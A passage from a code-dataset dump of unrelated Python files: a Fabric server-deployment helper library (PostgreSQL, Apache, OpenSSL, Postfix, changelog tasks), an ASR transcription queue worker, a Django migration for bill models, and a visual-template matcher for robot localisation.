--hard origin/{branch}\".format(branch=branch))\n else:\n changelog_append('cd {work_dir}\\n git pull --ff-only'.format(work_dir=work_dir))\n sudo(\"git merge --ff-only origin/{branch}\".format(branch=branch))\n got_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if changelog:\n if old_commit == got_commit:\n changelog_append(' # no changes')\n else:\n changelog_append(' # update {oldsha}..{sha}'.format(oldsha=old_commit, sha=got_commit))\n return got_commit\n\n\n#\n# PostgreSQL helper\n#\n\ndef postgresql_user_exists(user):\n \"\"\"Check if a postgresql user already exists.\"\"\"\n assert_shell_safe(user)\n out = sudo(\"psql -tAc \\\"SELECT 1 FROM pg_roles WHERE rolname = '%s'\\\"\" % user,\n user='postgres', quiet=True)\n return bool(out)\n\n\ndef ensure_postgresql_user(user):\n \"\"\"Create a PostgreSQL user if it doesn't exist already.\n\n This is idempotent: running it again won't add the same user again.\n \"\"\"\n assert_shell_safe(user)\n if not postgresql_user_exists(user):\n sudo(\"LC_ALL=C.UTF-8 createuser -DRS %s\" % user, user='postgres')\n\n\ndef postgresql_db_exists(dbname):\n \"\"\"Check if a PostgreSQL database already exists.\"\"\"\n assert_shell_safe(dbname)\n out = sudo(\"psql -tAc \\\"SELECT 1 FROM pg_database WHERE datname = '%s'\\\"\" % dbname,\n user='postgres', quiet=True)\n return bool(out)\n\n\ndef ensure_postgresql_db(dbname, owner):\n \"\"\"Create a PostgreSQL database if it doesn't exist already.\n\n This is idempotent: running it again won't create the database again.\n \"\"\"\n assert_shell_safe(dbname)\n if not postgresql_db_exists(dbname):\n sudo(\"LC_ALL=C.UTF-8 createdb -E utf-8 -l en_US.UTF-8 -T template0 -O %s %s\" % (owner, dbname),\n user='postgres')\n\n\n#\n# Apache\n#\n\ndef install_apache_website(apache_conf_template, domain, context=None,\n use_jinja=False, modules=[], reload_apache=True):\n \"\"\"Upload Apache config for a website and enable it.\n\n Takes care of\n - generating an apache config file template from ``apache_conf_template``\n - uploading it to /etc/apache2/sites-available/{domain}.conf\n - file permissions and ownership (0644, root:root)\n - creating a directory for logs (/var/log/apache2/{domain})\n - enabling the website with a2ensite\n - reloading apache\n\n Caveats:\n - assumes the Apache template configures logs in /var/log/apache2/{domain}\n - assumes any other files (such as SSL certificates and keys) required for\n the Apache config to work are already uploaded\n \"\"\"\n modules = aslist(modules)\n changed = generate_file(apache_conf_template,\n '/etc/apache2/sites-available/{}.conf'.format(domain),\n context=context, use_jinja=use_jinja)\n ensure_directory('/var/log/apache2/{}'.format(domain))\n modules = [m for m in modules\n if not exists('/etc/apache2/mods-enabled/{}.load'.format(m))]\n if modules:\n run_and_changelog(\"a2enmod {}\".format(' '.join(modules)))\n changed = True\n if not exists('/etc/apache2/sites-enabled/{}.conf'.format(domain)):\n run_and_changelog(\"a2ensite {}.conf\".format(domain))\n changed = True\n if reload_apache and changed:\n run_and_changelog(\"service apache2 reload\")\n\n\n#\n# OpenSSL\n#\n\nSTARTSSL_INTERMEDIATE_URL = 'https://www.startssl.com/certs/sub.class1.server.ca.pem'\n\n# A test on 2015-04-29 shows that STARTSSL_INTERMEDIATE_URL gives you the same\n# certificate as STARTSSL_INTERMEDIATE_SHA2_URL.\nSTARTSSL_INTERMEDIATE_SHA1_URL = 'https://www.startssl.com/certs/class1/sha1/pem/sub.class1.server.sha1.ca.pem'\nSTARTSSL_INTERMEDIATE_SHA2_URL = 'https://www.startssl.com/certs/class1/sha2/pem/sub.class1.server.sha2.ca.pem'\n\n\ndef ensure_ssl_key(ssl_key, ssl_csr, ssl_conf, ssl_cert, ssl_intermediate_cert,\n ssl_intermediate_cert_url, ssl_options):\n \"\"\"Make sure an SSL certificate exists.\n\n - ``ssl_key``: filename of the private key (will be generated if missing)\n - ``ssl_csr``: filename of the certificate signing request (will be\n generated if needed)\n - ``ssl_conf``: filename of the ssl configuration file (will be generated\n using ``ssl_options`` if needed and missing)\n - ``ssl_cert``: filename of the SSL certificate (alas this one cannot be\n generated automatically)\n - ``ssl_intermediate_cert``: filename of the SSL intermediate certificate\n (will be downloaded if missing)\n - ``ssl_intermediate_cert_url``: URL for downloading the intermediate\n certificate (e.g. STARTSSL_INTERMEDIATE_URL)\n - ``ssl_options``: a dictionary defining SSL certificate signing request\n generation options, specifically, the arguments to be passed to\n ``generate_ssl_config()`` -- country, state, locality, organization,\n organizational_unit, common_name, and email.\n\n \"\"\"\n if not exists(ssl_key, use_sudo=True):\n if not exists(ssl_conf):\n generate_ssl_config(ssl_conf, **ssl_options)\n generate_ssl_key(ssl_key, ssl_csr, ssl_conf)\n if not exists(ssl_csr):\n if not exists(ssl_conf):\n generate_ssl_config(ssl_conf, **ssl_options)\n generate_ssl_csr(ssl_key, ssl_csr, ssl_conf)\n if not exists(ssl_intermediate_cert):\n download_file(ssl_intermediate_cert, ssl_intermediate_cert_url)\n if not exists(ssl_cert):\n changelog_append('# aborting: {ssl_cert} is missing'.format(ssl_cert=ssl_cert))\n with quiet():\n csr = run('cat {ssl_csr}'.format(ssl_csr=ssl_csr))\n abort(\"{ssl_cert} is missing, please generate it using {ssl_csr}:\\n\\n{csr}\".format(\n ssl_cert=ssl_cert, ssl_csr=ssl_csr, csr=csr))\n\n\ndef generate_ssl_config(conffile, country, state, locality, organization,\n organizational_unit, common_name, email):\n \"\"\"Generate a config file for SSL certificates.\n\n Example::\n\n generate_ssl_config('/etc/pov/sslreq.conf',\n country='LT', state='.', locality='Vilnius',\n organization='POV', organizational_unit='.',\n common_name='www.example.com',\n email='root@example.com')\n\n \"\"\"\n assert_shell_safe(conffile)\n config = textwrap.dedent(\"\"\"\\\n [ req ]\n default_bits = 2048\n default_keyfile = privkey.pem\n distinguished_name = req_distinguished_name\n prompt = no\n\n [ req_distinguished_name ]\n countryName = {country}\n stateOrProvinceName = {state}\n localityName = {locality}\n organizationName = {organization}\n organizationalUnitName = {organizational_unit}\n commonName = {common_name}\n emailAddress = {email}\n \"\"\").format(country=country, state=state, locality=locality,\n organization=organization,\n organizational_unit=organizational_unit,\n common_name=common_name, email=email)\n if upload_file(StringIO(config), conffile):\n changelog_append(\"# generated {conffile}\".format(conffile=conffile))\n\n\ndef generate_ssl_key(keyfile, csrfile, conffile):\n \"\"\"Generate a new private SSL key and certificate signing request.\n\n Uses modern defaults for 2015: 2048-bit RSA, SHA-256 signature.\n \"\"\"\n assert_shell_safe(keyfile, csrfile, conffile)\n changelog_append(\"# generated {keyfile} and {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile))\n sudo(\"openssl req -config {conffile} -newkey rsa:2048 -nodes\"\n \" -keyout {keyfile} -sha256 -out {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile, conffile=conffile))\n\n\ndef generate_ssl_csr(keyfile, csrfile, conffile):\n \"\"\"Generate a new certificate signing request for a given SSL private key.\n\n Uses modern defaults for 2015: SHA-256 signature.\n \"\"\"\n assert_shell_safe(keyfile, csrfile, conffile)\n changelog_append(\"# generated {csrfile}\".format(csrfile=csrfile))\n sudo(\"openssl req -config {conffile} -new -key {keyfile} -sha256\"\n \" -out {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile, conffile=conffile))\n\n\n#\n# Postfix\n#\n\ndef install_postfix_virtual_table(local, remote, changelog_append=True):\n \"\"\"Upload a Postfix virtual table and install it.\n\n Takes care of\n - uploading the local file to remote\n - file permissions and ownership (0644, root:root)\n - running postmap\n - adding the table to /etc/postfix/main.cf virtual_maps\n - making sure that postfix accepts outside connections\n (inet_interfaces != loopback-only)\n - changelog updates for all of the above\n\n If ``changelog_append`` is False creates a new timestamped header.\n If it's True, appends to the current message.\n \"\"\"\n assert_shell_safe(remote)\n if upload_file(local, remote):\n changelog('# updated {remote}'.format(remote=remote),\n append=changelog_append)\n run_and_changelog(\"postmap {remote}\".format(remote=remote))\n # consider running postmap if the file exists and hasn't changed but the\n # corresponding .map file is missing or outdated\n add_postfix_virtual_map('hash:' + remote)\n make_postfix_public()\n\n\ndef get_postfix_setting(setting):\n \"\"\"Get the current value of a postfix setting\"\"\"\n assert_shell_safe(setting)\n with quiet():\n current_setting = run(\"postconf -h {setting}\".format(setting=setting))\n if current_setting.startswith('postconf: warning:'):\n # assume \"postconf: warning: {setting}: unknown parameter\"\n current_setting = ''\n return current_setting\n\n\ndef parse_postfix_setting(current_setting):\n \"\"\"Parse a comma-separated postfix setting.\n\n Returns a list of (non-empty) strings.\n \"\"\"\n return filter(None, map(str.strip, current_setting.split(',')))\n\n\ndef add_postfix_virtual_map(entry):\n \"\"\"Add an entry to postfix's virtual_maps.\n\n Takes care to\n - preserve preexisting virtual maps\n - reload postfix's configurationa after changing it\n - document all the changes in the changelog\n\n Idempotent: does nothing if entry is already included in virtual_maps.\n \"\"\"\n assert_shell_safe(entry, extra_allow=':')\n current_setting = get_postfix_setting('virtual_alias_maps')\n if current_setting != '$virtual_maps':\n # TBH maybe we should ignore the legacy $virtual_maps and instead\n # just use $virtual_alias_maps?\n abort(\"Unexpected virtual_alias_maps setting ({})\".format(current_setting))\n add_postfix_setting('virtual_maps', entry)\n\n\ndef add_postfix_setting(setting, entry, reload_postfix=True):\n \"\"\"Add an entry to a comma-separated postfix setting.\n\n Takes care to\n - preserve preexisting values\n - reload postfix's configuration after changing it\n - document all the changes in the changelog\n\n Idempotent: does nothing if entry is already included in the setting.\n\n Returns True if the setting was modified, False if it was untouched.\n \"\"\"\n assert_shell_safe(setting)\n assert_shell_safe(entry, extra_allow=':')\n old_value = get_postfix_setting(setting)\n items = parse_postfix_setting(old_value)\n if entry in items:\n return False\n else:\n items.append(entry)\n new_value = ', '.join(items)\n if \"'\" in new_value:\n abort(\"Cannot handle apostrophes in {setting} setting ({old_value}),\"\n \" not touching anything!\".format(setting=setting,\n old_value=old_value))\n changelog_append('# adding {entry} to {setting} in /etc/postfix/main.cf'.format(\n entry=entry, setting=setting))\n res = run_and_changelog(\"postconf {setting}='{new_value}'\".format(\n setting=setting, new_value=new_value))\n if res.startswith(\"postconf: warning:\"):\n # Uhh on Ubuntu 10.04 postconf can't handle non-standard variables at all\n changelog_append(\" | %s\" % res.rstrip())\n abort(\"Your version of postconf ignores unknown settings; you'll have to edit /etc/postfix/main.cf and reload postfix manually.\")\n if reload_postfix:\n run_and_changelog(\"postfix reload\")\n return True\n\n\ndef make_postfix_public():\n \"\"\"Make sure postfix accepts connections from outside.\n\n Takes care to\n - restart postfix if necessary\n - document all the changes in the changelog\n \"\"\"\n with quiet():\n current_setting = run(\"postconf -h inet_interfaces\")\n if current_setting == 'loopback-only':\n run_and_changelog(\"postconf inet_interfaces=all\")\n run_and_changelog(\"service postfix restart\")\n\n\n#\n# pov-admin-tools\n#\n\ndef has_new_changelog_message():\n \"\"\"Check if new-changelog-entry is installed.\n\n (You can get it by installing pov-admin-tools.)\n \"\"\"\n return (exists('/usr/sbin/new-changelog-entry') or\n exists('/usr/local/sbin/new-changelog-entry'))\n\n\ndef changelog(message, context=None, append=False, optional=True):\n \"\"\"Append a message to /root/Changelog, with a timestamped header.\n\n Depends on pov-admin-tools. If it's not installed, skips the\n message (unless you say optional=False, in which case it aborts\n with an error).\n\n By default the message gets a timestamped header. Use append=True\n to append to an existing message instead of starting a new one.\n\n If context is given, message will be formatted using given context\n (``message = message.format(**context)``).\n \"\"\"\n # NB: no assert_shell_safe(): quote() ought to take care of everything.\n if not optional or has_new_changelog_message():\n cmd = 'new-changelog-entry'\n if append:\n cmd += ' -a'\n if context is not None:\n message = message.format(**context)\n cmd += ' ' + quote(message)\n run_as_root(cmd)\n\n\ndef changelog_append(message, context=None, optional=True):\n \"\"\"Append a message to /root/Changelog.\n\n Shortcut for changelog(message, append=True).\n \"\"\"\n changelog(message, context, append=True, optional=optional)\n\n\ndef changelog_banner(message, context=None, optional=True):\n \"\"\"Append a banner message to /root/Changelog.\"\"\"\n changelog(\"#\\n # %s\\n #\" % message, context, optional=optional)\n\n\ndef run_and_changelog(command, append=True):\n \"\"\"Run a command and also append it to /root/Changelog\"\"\"\n changelog(command, append=append)\n return run_as_root(command)\n\n\ndef run_as_root(command):\n \"\"\"Run a command as root; use sudo only if necessary.\"\"\"\n current_user = env.host_string.rpartition('@')[0] or env.user\n if current_user != 'root':\n return sudo(command, user='root')\n else:\n return run(command)\n\n\n#\n# Instance management\n#\n\n\nclass Instance(dict):\n \"\"\"Service instance configuration.\n\n Subclass to add more parameters, e.g. ::\n\n from pov_fabric import Instance as BaseInstance\n\n class Instance(BaseInstance):\n def __init__(self, name, host, home='/opt/project'):\n super(Instance, self).Instance.__init__(name, host)\n self.home = home\n\n Or use the ``with_params()`` classmethod.\n \"\"\"\n\n def __init__(self, name, host, **kwargs):\n # This trick lets us access dict keys as if they were object attributes\n # and vice versa.\n self.__dict__ = self\n self.name = name\n self.host = host\n self.__dict__.update(kwargs)\n\n def _asdict(self):\n \"\"\"(DEPRECATED) Return the instance parameters as a dict.\n\n Useful for string formatting, e.g. ::\n\n print('{name} is on {host}'.format(**instance._asdict()))\n\n but since now you can do ::\n\n print('{name} is on {host}'.format(**instance))\n\n this method is pointless and is retained for backwards compatibility\n only.\n\n Mimics the API of ``collections.namedtuple``.\n \"\"\"\n return self\n\n REQUIRED = object()\n\n @classmethod\n def with_params(cls, **params):\n \"\"\"Define an instance subclass\n\n Usage example::\n\n from pov_fabric import Instance as BaseInstance\n\n Instance = BaseInstance.with_params(\n required_arg1=BaseInstance.REQUIRED,\n optional_arg1='default value',\n optional_arg2=None)\n\n \"\"\"\n\n def __init__(self, name, host, **kw):\n super(new_cls, self).__init__(name, host)\n for k, v in params.items():\n if v is cls.REQUIRED and k not in kw:\n raise TypeError(\n \"__init__() requires a keyword argument '{}'\"\n .format(k))\n setattr(self, k, v)\n for k, v in kw.items():\n if k not in params:\n raise TypeError(\n \"__init__() got an unexpected keyword argument '{}'\"\n .format(k))\n setattr(self, k, v)\n new_cls = type('Instance', (cls, ), dict(__init__=__init__))\n return new_cls\n\n @classmethod\n def define(cls, *args, **kwargs):\n \"\"\"Define an instance.\n\n Creates a new Instance object with the given constructor arguments,\n registers it in env.instances and defines an instance selector task.\n \"\"\"\n instance = cls(*args, **kwargs)\n _define_instance(instance)\n _define_instance_task(instance.name, stacklevel=2)\n\n @classmethod\n def define_alias(cls, alias, name):\n \"\"\"Define an alias for an instance.\n\n Defines an instance selector task named ``alias`` that selects an\n instance named ``name``.\n\n Usage example::\n\n Instance.define_alias('prod', 'srv1.example.com')\n\n \"\"\"\n _define_instance_task(alias, name, stacklevel=2)\n\n\ndef _define_instance(instance):\n \"\"\"Define an instance.\n\n Instances are stored in the ``env.instances`` dictionary, which is created\n on demand.\n \"\"\"\n if not _valid_task_name(instance.name):\n abort(\"'{name}' is not a valid instance name.\".format(name=instance.name))\n if not hasattr(env, 'instances'):\n env.instances = {}\n if instance.name in env.instances:\n abort(\"Instance {name} is already defined.\".format(name=instance.name))\n env.instances[instance.name] = instance\n\n\ndef _define_instance_task(name, instance_name=None, stacklevel=1):\n \"\"\"Define an instance task\n\n This task will set env.instance to the name of the task.\n \"\"\"\n if not _valid_task_name(name):\n abort(\"'{name}' is not a valid task name.\".format(name=name))\n if instance_name is None:\n instance_name = name\n def fn():\n env.instance = instance_name\n fn.__doc__ = \"\"\"Select instance '%s' for subsequent tasks.\"\"\" % instance_name\n instance_task = task(name=name)(fn)\n fn_name = _pythonify_name(name)\n module_globals = sys._getframe(stacklevel).f_globals\n while fn_name in module_globals:\n fn_name += '_'\n module_globals[fn_name] = instance_task\n\n\ndef _valid_task_name(name):\n \"\"\"Check if ``name`` is a valid Fabric task name\"\"\"\n if not name:\n return False\n if name.startswith('-'):\n return False\n if ' ' in name:\n return False\n if ':' in name:\n return False\n if '.' in name:\n return False\n return True\n\n\ndef _pythonify_name(name):\n \"\"\"Coerce the name to a valid Python identifier\"\"\"\n name = ''.join(c if c.isalnum() else '_' for c in name)\n if name[:1].isdigit():\n name = '_' + name\n return name\n\n\ndef get_instance(instance_name=None):\n \"\"\"Select the instance to operate on.\n\n Defaults to env.instance if instance_name is not specified.\n\n Aborts with a help message if the instance is not defined.\n \"\"\"\n instances = sorted(getattr(env, 'instances', {}))\n if not instances:\n abort(\"There are no instances defined in env.instances.\")\n if not instance_name:\n instance_name = getattr(env, 'instance', None)\n try:\n return env.instances[instance_name]\n except KeyError:\n abort(\"Please specify an instance ({known_instances}), e.g.\\n\\n\"\n \" fab {instance} {command}\".format(\n known_instances=\", \".join(instances),\n instance=instances[0],\n command=env.command))\n","sub_path":"pov_fabric.py","file_name":"pov_fabric.py","file_ext":"py","file_size_in_byte":42103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389803125","text":"from alex_asr import Decoder\nimport wave\nimport json\nimport os\nimport worker_lib.s3 as s3\nfrom worker_lib.queue import watch_queue\nimport worker_lib.db_op as db\n\nprint('Initialising decoder')\nDECODER = Decoder('/opt/app/model/')\n\nUPLOADS_DIR = '/opt/app/uploads/'\n\ndef transcribe(filename):\n \n data = wave.open(UPLOADS_DIR + filename, \"rb\")\n \n try:\n frames = data.readframes(data.getnframes())\n finally:\n data.close()\n\n # Feed the audio data to the decoder.\n DECODER.accept_audio(frames)\n DECODER.decode(data.getnframes()) # transcribe\n DECODER.input_finished()\n\n # Get and print the best hypothesis.\n prob, word_ids = DECODER.get_best_path()\n\n result = \" \".join(DECODER.get_word(word_id).decode('utf-8') for word_id in word_ids)\n\n # Get timings\n alignment = DECODER.get_time_alignment() # returns sequence (tuple) of lists\n\n # Create list of word tuples\n words_with_alignment = [(DECODER.get_word(w).decode('utf-8'), t, d) for (w,t,d) in zip(*alignment)]\n DECODER.reset()\n\n return result, words_with_alignment\n\n\ndef handle_message(ch, method, properties, body):\n body = body.decode('utf-8')\n msg = json.loads(body)\n file_id = msg['id']\n filename = msg['audio_file']\n\n driver = os.environ['FILE_DRIVER']\n\n try:\n if driver == 's3':\n print('Using S3 for file ' + 'uploads/' + filename)\n s3.download_file('uploads/' + filename, UPLOADS_DIR + filename)\n\n db.update_status(file_id, filename, 'Transcribing')\n result, words_with_alignment = transcribe(filename)\n\n db.update_status(file_id, filename, 'Writing transcription to DB')\n db.save_transcription(file_id, result, words_with_alignment)\n\n db.update_status(file_id, filename, 'Transcription complete')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n msg['words_with_alignment'] = words_with_alignment\n msg_str = json.dumps(msg)\n print(\"words_with_alignment: \" + str(words_with_alignment))\n ch.basic_publish(\n exchange='',\n routing_key=\"punctuation.\" + os.environ['QUEUE_NAME'],\n body=msg_str\n )\n print(\"Message sent\")\n\n except Exception as e:\n db.mark_transcription_failed(file_id)\n db.update_status(file_id, filename, \"Transcription failed: {0}\".format(e))\n ch.basic_reject(delivery_tag=method.delivery_tag, requeue=False)\n\n finally:\n if driver == 's3':\n if os.path.exists(UPLOADS_DIR + filename):\n os.remove(UPLOADS_DIR + filename) # Remove temp file\n\n\nwatch_queue(os.environ['QUEUE_NAME'], handle_message)\n","sub_path":"workers/ASR/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"77480145","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BillAuthor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('institute', models.BooleanField(default=True)),\n ('person', models.BooleanField(default=False)),\n ('first_name', models.CharField(max_length=30, null=True, blank=True)),\n ('last_name', models.CharField(max_length=50, null=True, blank=True)),\n ],\n options={\n 'ordering': ('name',),\n },\n ),\n migrations.CreateModel(\n name='Bills',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(unique=True, max_length=b'350')),\n ('description', models.TextField(null=True, blank=True)),\n ('state', models.CharField(default=b'CO', max_length=2, choices=[(b'OP', b'Open'), (b'CL', b'Closed'), (b'CO', b'Construction')])),\n ('consequences', models.TextField(null=True, blank=True)),\n ('author', models.ManyToManyField(to='bills.BillAuthor')),\n ],\n options={\n 'ordering': ('title',),\n },\n ),\n ]\n","sub_path":"bills/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"318809814","text":"\n# -------------------------------------------------------------------[ header ]\n\nimport numpy as np\nfrom ._globals import *\n\n# ------------------------------------------------------------[ VisualTemplate class ]\n\nclass VisualTemplate(object):\n def __init__(self, id, data, current_mean):\n self.id = id\n self.data = data[:]\n self.mean = current_mean\n\n# ------------------------------------------------------------[ LocalViewMatch class ]\n\nclass LocalViewMatch(object):\n def __init__(self):\n '''\n templates: 1D numpy array that stores all visual templates created\n\n current-view: 1D numpy array that stores the current template relative\n to the current frame\n\n current-mean: current mean of the template current-view\n\n current-vt: id of the current visual template\n\n vt-error: current error between the current visual template and the\n closest visual template\n\n prev-vt: id of the previous visual template\n\n vt-relative-rad: relative facing angle between closest visual template\n and current visual template\n\n view-rgb: store the current frame captured by the robot\n\n greyscale: controls if the image is in grayscale\n '''\n\n \n self.templates = np.array([])\n self.current_view = np.zeros(TEMPLATE_SIZE)\n self.current_mean = 0\n self.current_vt = 0\n self.vt_error = 0\n self.prev_vt = 0\n self.vt_relative_rad = 0\n\n self.IMAGE_VT_X_RANGE_MAX = IMAGE_VT_X_RANGE_MAX\n self.IMAGE_VT_X_RANGE_MIN = IMAGE_VT_X_RANGE_MIN\n\n self.view_rgb = np.array([])\n self.greyscale = True\n \n\n def on_image(self, view_rgb, greyscale):\n '''\n Purpose: This routine compare a visual template to all the stored templates,\n returning the matching template and the error between these two\n\n Algorithm: Convert the current frame to a template. Then, compare the current\n template to all stored templates. Finally, check if error between the closest\n template found is enough for consider this a matching template\n\n Inputs:\n view_rgb: current frame captured by the robot\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale\n\n Outputs: True, if a mathed visual template was found, otherwise, False\n '''\n if( view_rgb.size == 0 ):\n return False\n\n # first: store the current frame\n self.view_rgb = view_rgb[:]\n self.greyscale = greyscale\n\n # second: convert the current frame to a template and update the prev_vt value\n\n # Matheus: converts to a template size sum y and x values in blocks and normalize them.\n self.current_view = self.__convert_view_to_view_template__( greyscale )\n\n self.prev_vt = self.current_vt\n\n # third: compare the current template to all stored templates\n vt_match_id = 0\n self.vt_error, vt_match_id = self.__compare__( self.vt_error, vt_match_id )\n\n # finally: if error between the closest template found is enough for\n # consider this a matching template\n #print \"error: \" + str(self.vt_error)\n if ( self.vt_error <= VT_MATCH_THRESHOLD ):\n \n self.__set_current_vt__( vt_match_id )\n return True\n else:\n self.vt_relative_rad = 0\n self.__set_current_vt__( self.__create_template__() )\n return False\n \n\n # def on_image_merge(self, view_rgb, greyscale):\n def on_image_merge(self, template_view, template_mean):\n '''\n Purpose: This routine compare a visual template to all the stored templates,\n returning the matching template and the error between these two without create\n new or set any previous templates.\n\n Algorithm: Convert the current frame to a template. Then, compare the current\n template to all stored templates. Finally, check if error between the closest\n template found is enough for consider this a matching template\n\n Inputs:\n view_rgb: current frame captured by the robot\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale\n\n Outputs: True, if a mathed visual template was found, otherwise, False\n '''\n # if( view_rgb.size == 0 ):\n # return False\n\n # first: store the current frame\n # self.view_rgb = view_rgb[:]\n # self.greyscale = greyscale\n\n # second: convert the current frame to a template and update the prev_vt value\n\n # Matheus: converts to a template size sum y and x values in blocks and normalize them.\n # self.current_view = self.__convert_view_to_view_template__( greyscale )\n self.current_view = template_view\n self.current_mean = template_mean\n\n self.prev_vt = self.current_vt\n\n # third: compare the current template to all stored templates\n vt_match_id = -1\n self.vt_error, vt_match_id = self.__compare__( self.vt_error, vt_match_id )\n\n # finally: if error between the closest template found is enough for\n # consider this a matching template\n \n if ( self.vt_error <= VT_MATCH_THRESHOLD ):\n return True, vt_match_id\n else:\n return False, vt_match_id\n\n\n def __clip_view_x_y__(self,x,y):\n '''\n Purpose: This routine verifies if the value of x and y coordinates are in\n a valid range (between 0 and TEMPLATE-X-SIZE or TEMPLATE-Y-SIZE), and if\n they are not, corrected their value.\n\n Algorithm: Verifies if the value of x and y coordinates are in a valid\n range (between 0 and TEMPLATE-X-SIZE or TEMPLATE-Y-SIZE), and if they\n are not, correct their values to 0 or TEMPLATE-SIZE, depending which\n one is closer to the current value of x and y.\n\n Inputs:\n x: x coordinate\n y: y coordinate\n\n Outputs: x and y updated\n '''\n if x < 0:\n x = 0\n elif x > TEMPLATE_X_SIZE - 1:\n x = TEMPLATE_X_SIZE - 1\n\n if y < 0:\n y = 0\n elif y > TEMPLATE_Y_SIZE - 1:\n y = TEMPLATE_Y_SIZE - 1\n\n return x,y\n\n\n def __convert_view_to_view_template__(self, grayscale):\n '''\n Purpose: This routine transforms the current frame in a 1D array normalized\n that can be used as a template.\n\n Algorithm: It first defines the ranges of the current frame (self.view-rgb)\n that are going to be used. Then it sums blocks of pixels of\n size x-block-size * y-block-size. Then, the resulting array is divided\n by x-block-size * y-block-size and by 255, if it is a grayscale frame.\n In case it is used an RGB frame, the algorithm is the same, however,\n the current view is also divided by 3. If VT-NORMALISATION > 0, all\n values will be normalized by this value. Finally, the current mean is\n calculated.\n\n Inputs:\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale.\n\n Outputs: numpy array of 1D (TEMPLATE-X-SIZE * TEMPLATE-Y-SIZE) normalized\n '''\n sub_range_x = IMAGE_VT_X_RANGE_MAX - IMAGE_VT_X_RANGE_MIN\n sub_range_y = IMAGE_VT_Y_RANGE_MAX - IMAGE_VT_Y_RANGE_MIN\n\n x_block_size = sub_range_x / TEMPLATE_X_SIZE\n y_block_size = sub_range_y / TEMPLATE_Y_SIZE\n\n # first: select the part of the frame that is going to be used\n #self.current_view = self.view_rgb[ IMAGE_VT_Y_RANGE_MIN : IMAGE_VT_Y_RANGE_MAX, IMAGE_VT_X_RANGE_MIN : IMAGE_VT_X_RANGE_MAX ]\n self.current_view = np.zeros(TEMPLATE_SIZE)\n\n if grayscale:\n\n y_block_count = 0\n x_block_count = 0\n data_next = 0\n for y_block in range(IMAGE_VT_Y_RANGE_MIN, IMAGE_VT_Y_RANGE_MAX, int(y_block_size)): # Change Python 3 - Paulo \n for x_block in range(IMAGE_VT_X_RANGE_MIN, IMAGE_VT_X_RANGE_MAX, int(x_block_size)): # Change Python 3 - Paulo \n for x in range(x_block, x_block + int(x_block_size)): # Change Python 3 - Paulo \n for y in range(y_block, y_block + int(y_block_size)):\n self.current_view[data_next] += self.view_rgb[y][x]\n self.current_view[data_next] /= 255.0\n self.current_view[data_next] /= (x_block_size * y_block_size)\n data_next+=1\n x_block_count+=1\n y_block_count+=1\n\n '''\n # second: reshape the vector with y rows to y_block rows and sum the values in y-axis\n self.current_view = np.sum( self.current_view.reshape( y_block_size, TEMPLATE_Y_SIZE * sub_range_x ),0 )\n # third: reshape the vector with 1 row to x_block_size rows\n self.current_view = self.current_view.reshape( x_block_size, TEMPLATE_X_SIZE * TEMPLATE_Y_SIZE )\n # finally: sum all values in y-axis and divide all by 255 * x_block_size * y_block_size\n self.current_view = np.sum( self.current_view , 0 )/( 255.0 * x_block_size * y_block_size )\n '''\n else:\n self.current_view = self.current_view.reshape( sub_range_y, 3 * sub_range_x )\n self.current_view = np.sum( self.current_view.reshape( y_block_size, 3 * TEMPLATE_Y_SIZE * sub_range_x ), 0 )\n self.current_view = self.current_view.reshape( 3 * x_block_size,TEMPLATE_X_SIZE * TEMPLATE_Y_SIZE )\n self.current_view = np.sum( self.current_view, 0 ) / ( 3.0 * 255.0 * x_block_size * y_block_size )\n\n # just multiply all values by VT_NORMALISATION, divide all by the mean and\n # keep all values between 0 and 1\n if VT_NORMALISATION > 0:\n avg_value = np.mean( self.current_view )\n self.current_view = self.current_view * VT_NORMALISATION / avg_value\n self.current_view = np.minimum( self.current_view, 1.0 )\n self.current_view = np.maximum( self.current_view, 0.0 )\n\n # NOT USED\n # now do patch normalisation\n # +- patch size on the pixel, ie 4 will give a 9x9\n if VT_PATCH_NORMALISATION > 0:\n patch_size = VT_PATCH_NORMALISATION\n patch_total = (patch_size * 2 + 1) * (patch_size * 2 + 1)\n current_view_copy = self.current_view[:]\n\n for x in range(TEMPLATE_X_SIZE):\n for y in range(TEMPLATE_Y_SIZE):\n patch_sum = 0\n for patch_x in range(x - patch_size, x + patch_size + 1):\n for patch_y in range(y - patch_size, y + patch_size + 1):\n patch_x_clip, patch_y_clip = self.__clip_view_x_y__(patch_x, patch_y)\n patch_sum += current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE]\n patch_mean = patch_sum / patch_total\n patch_sum = 0\n for patch_x in range(x - patch_size, x + patch_size + 1):\n for patch_y in range(y - patch_size, y + patch_size + 1):\n patch_x_clip, patch_y_clip = self.__clip_view_x_y__(patch_x, patch_y)\n patch_sum += ((current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE] - patch_mean)* (current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE] - patch_mean))\n\n patch_std = np.sqrt(patch_sum / patch_total)\n if ( patch_std < VT_MIN_PATCH_NORMALISATION_STD ):\n self.current_view[x + y * TEMPLATE_X_SIZE] = 0.5\n else:\n self.current_view[x + y * TEMPLATE_X_SIZE] = max(0, min(1.0, (((current_view_copy[x + y * TEMPLATE_X_SIZE] - patch_mean) / patch_std) 